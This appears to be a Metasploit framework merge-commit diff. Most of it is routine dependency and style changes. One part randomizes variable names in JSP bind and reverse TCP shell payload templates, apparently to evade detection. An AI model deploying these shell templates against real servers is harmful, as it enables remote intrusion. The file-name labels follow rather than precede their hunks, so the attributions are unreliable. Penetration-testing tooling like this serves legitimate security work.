Merge pull request #8 from rapid7/master

bla

Author: Pedro Ribeiro

.gitignore

@@ -7,6 +7,12 @@ Gemfile.local.lock
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
 .rvmrc
+# Allow for a local choice of (unsupported / semi-supported) ruby versions
+# See PR #4136 for usage, but example usage for rvm:
+#   rvm --create --versions-conf use 2.1.4@metasploit-framework
+# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
+#   rbenv shell 2.1.4
+.versions.conf
 # YARD cache directory
 .yardoc
 # Mac OS X files

Gemfile

@@ -3,8 +3,6 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec
 
-gem 'rb-readline', require: false
-
 group :db do
   # Needed for Msf::DbManager
   gem 'activerecord', '>= 3.0.0', '< 4.0.0'

Gemfile.lock

@@ -232,7 +232,6 @@ DEPENDENCIES
   pg (>= 0.11)
   pry
   rake (>= 10.0.0)
-  rb-readline
   redcarpet
   rspec (>= 2.12, < 3.0.0)
   rspec-rails (>= 2.12, < 3.0.0)

data/exploits/CVE-2010-1240/template.pdf

@@ -38,10 +38,11 @@ def get_eicar_exe
     obfus_eicar.join("-").upcase
   end
 
-  def get_custom_exe(path=nil)
+  def get_custom_exe(path = nil)
     path ||= datastore['EXE::Custom']
     print_status("Using custom payload #{path}, RHOST and RPORT settings will be ignored!")
     datastore['DisablePayloadHandler'] = true
+    exe = nil
     ::File.open(path,'rb') {|f| exe = f.read(f.stat.size)}
     exe
   end
@@ -160,7 +161,7 @@ def exe_init_options(opts)
   end
 
   def exe_post_generation(opts)
-    if (opts[:fellback])
+    if opts[:fellback]
       print_status("Warning: Falling back to default template: #{opts[:fellback]}")
     end
   end

lib/msf/core/exploit/exe.rb

@@ -87,6 +87,9 @@ def self.from_a(ary)
 
   #
   # Initialize the site reference.
+  # If you're updating the references, please also update:
+  # * tools/module_reference.rb
+  # * https://github.com/rapid7/metasploit-framework/wiki/Metasploit-module-reference-identifiers
   #
   def initialize(in_ctx_id = 'Unknown', in_ctx_val = '')
     self.ctx_id  = in_ctx_id

lib/msf/core/module/reference.rb

@@ -22,6 +22,12 @@ def initialize(info = {})
   # @return [String] jsp code that executes bind TCP payload
   def jsp_bind_tcp
     # Modified from: http://www.security.org.sg/code/jspreverse.html
+
+    var_is = Rex::Text.rand_text_alpha_lower(2)
+    var_os = Rex::Text.rand_text_alpha_lower(2)
+    var_in = Rex::Text.rand_text_alpha_lower(2)
+    var_out = Rex::Text.rand_text_alpha_lower(3)
+
     jsp = <<-EOS
 <%@page import="java.lang.*"%>
 <%@page import="java.util.*"%>
@@ -31,37 +37,37 @@ def jsp_bind_tcp
 <%
   class StreamConnector extends Thread
   {
-    InputStream is;
-    OutputStream os;
+    InputStream #{var_is};
+    OutputStream #{var_os};
 
-    StreamConnector( InputStream is, OutputStream os )
+    StreamConnector( InputStream #{var_is}, OutputStream #{var_os} )
     {
-      this.is = is;
-      this.os = os;
+      this.#{var_is} = #{var_is};
+      this.#{var_os} = #{var_os};
     }
 
     public void run()
     {
-      BufferedReader in  = null;
-      BufferedWriter out = null;
+      BufferedReader #{var_in}  = null;
+      BufferedWriter #{var_out} = null;
       try
       {
-        in  = new BufferedReader( new InputStreamReader( this.is ) );
-        out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+        #{var_in}  = new BufferedReader( new InputStreamReader( this.#{var_is} ) );
+        #{var_out} = new BufferedWriter( new OutputStreamWriter( this.#{var_os} ) );
         char buffer[] = new char[8192];
         int length;
-        while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+        while( ( length = #{var_in}.read( buffer, 0, buffer.length ) ) > 0 )
         {
-          out.write( buffer, 0, length );
-          out.flush();
+          #{var_out}.write( buffer, 0, length );
+          #{var_out}.flush();
         }
       } catch( Exception e ){}
       try
       {
-        if( in != null )
-          in.close();
-        if( out != null )
-          out.close();
+        if( #{var_in} != null )
+          #{var_in}.close();
+        if( #{var_out} != null )
+          #{var_out}.close();
       } catch( Exception e ){}
     }
   }
@@ -87,6 +93,12 @@ class StreamConnector extends Thread
   # @return [String] jsp code that executes reverse TCP payload
   def jsp_reverse_tcp
     # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
+
+    var_is = Rex::Text.rand_text_alpha_lower(2)
+    var_os = Rex::Text.rand_text_alpha_lower(2)
+    var_in = Rex::Text.rand_text_alpha_lower(2)
+    var_out = Rex::Text.rand_text_alpha_lower(3)
+
     jsp = <<-EOS
 <%@page import="java.lang.*"%>
 <%@page import="java.util.*"%>
@@ -96,37 +108,37 @@ def jsp_reverse_tcp
 <%
   class StreamConnector extends Thread
   {
-    InputStream is;
-    OutputStream os;
+    InputStream #{var_is};
+    OutputStream #{var_os};
 
-    StreamConnector( InputStream is, OutputStream os )
+    StreamConnector( InputStream #{var_is}, OutputStream #{var_os} )
     {
-      this.is = is;
-      this.os = os;
+      this.#{var_is} = #{var_is};
+      this.#{var_os} = #{var_os};
     }
 
     public void run()
     {
-      BufferedReader in  = null;
-      BufferedWriter out = null;
+      BufferedReader #{var_in}  = null;
+      BufferedWriter #{var_out} = null;
       try
       {
-        in  = new BufferedReader( new InputStreamReader( this.is ) );
-        out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+        #{var_in}  = new BufferedReader( new InputStreamReader( this.#{var_is} ) );
+        #{var_out} = new BufferedWriter( new OutputStreamWriter( this.#{var_os} ) );
         char buffer[] = new char[8192];
         int length;
-        while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+        while( ( length = #{var_in}.read( buffer, 0, buffer.length ) ) > 0 )
         {
-          out.write( buffer, 0, length );
-          out.flush();
+          #{var_out}.write( buffer, 0, length );
+          #{var_out}.flush();
         }
       } catch( Exception e ){}
       try
       {
-        if( in != null )
-          in.close();
-        if( out != null )
-          out.close();
+        if( #{var_in} != null )
+          #{var_in}.close();
+        if( #{var_out} != null )
+          #{var_out}.close();
       } catch( Exception e ){}
     }
   }

lib/msf/core/payload/jsp.rb

@@ -24,11 +24,11 @@ def initialize(data=nil)
       self.header.parse(head)
       ctype = self.header.find('Content-Type')
 
-      if ctype and ctype[1] and ctype[1] =~ /multipart\/mixed;\s*boundary="?([A-Za-z0-9'\(\)\+\_,\-\.\/:=\?^\s]+)"?/
+      if ctype && ctype[1] && ctype[1] =~ /multipart\/mixed;\s*boundary="?([A-Za-z0-9'\(\)\+\_,\-\.\/:=\?^\s]+)"?/
         self.bound = $1
         chunks = body.to_s.split(/--#{self.bound}(--)?\r?\n/)
         self.content = chunks.shift.to_s.gsub(/\s+$/, '')
-        self.content << "\r\n" if not self.content.empty?
+        self.content << "\r\n" unless self.content.empty?
 
         chunks.each do |chunk|
           break if chunk == "--"
@@ -88,15 +88,13 @@ def mime_defaults
   def add_part(data='', content_type='text/plain', transfer_encoding="8bit", content_disposition=nil)
     part = Rex::MIME::Part.new
 
-    if (content_disposition)
+    if content_disposition
       part.header.set("Content-Disposition", content_disposition)
     end
 
-    if (content_type)
-      part.header.set("Content-Type", content_type)
-    end
+    part.header.set("Content-Type", content_type) if content_type
 
-    if (transfer_encoding)
+    if transfer_encoding
       part.header.set("Content-Transfer-Encoding", transfer_encoding)
     end
 
@@ -125,20 +123,17 @@ def add_part_inline_attachment(data, name)
   end
 
   def to_s
-    msg = force_crlf(self.header.to_s + "\r\n")
+    header_string = self.header.to_s
 
-    unless self.content.blank?
-      msg << force_crlf(self.content + "\r\n")
-    end
+    msg = header_string.empty? ? '' : force_crlf(self.header.to_s + "\r\n")
+    msg << force_crlf(self.content + "\r\n") unless self.content.blank?
 
     self.parts.each do |part|
       msg << force_crlf("--" + self.bound + "\r\n")
       msg << part.to_s
     end
 
-    if self.parts.length > 0
-      msg << force_crlf("--" + self.bound + "--\r\n")
-    end
+    msg << force_crlf("--" + self.bound + "--\r\n") if self.parts.length > 0
 
     msg
   end

lib/rex/mime/message.rb

@@ -66,6 +66,10 @@ def login(name = '', user = '', pass = '', domain = '',
 
       self.client.spnopt = spnopt
 
+      # In case the user unsets the password option, we make sure this is
+      # always a string
+      pass ||= ''
+
       ok = self.client.session_setup(user, pass, domain)
     rescue ::Interrupt
       raise $!

lib/rex/proto/smb/simpleclient.rb

@@ -76,8 +76,14 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'railties'
   # required for OS fingerprinting
   spec.add_runtime_dependency 'recog', '~> 1.0'
-  # read... lines...
-  spec.add_runtime_dependency 'rb-readline'
+
+  # rb-readline doesn't work with Ruby Installer due to error with Fiddle:
+  #   NoMethodError undefined method `dlopen' for Fiddle:Module
+  unless Gem.win_platform?
+    # Command line editing, history, and tab completion in msfconsole
+    spec.add_runtime_dependency 'rb-readline'
+  end
+
   # Needed by anemone crawler
   spec.add_runtime_dependency 'robots'
   # Needed by some modules